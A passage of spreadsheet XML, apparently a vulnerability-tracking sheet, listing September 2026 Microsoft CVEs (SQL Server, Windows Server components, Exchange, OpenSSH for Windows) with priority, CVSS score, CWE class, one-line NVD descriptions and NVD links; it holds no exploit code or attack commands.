          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K728" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S728" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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29" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S729" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69329</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="S730" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S731" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69378</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S732" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S733" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K73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34" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S734" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69429</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S735" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K736" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S736" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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37" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S737" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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38" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S738" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69587</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S739" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69588</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K742" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69631</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69710</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
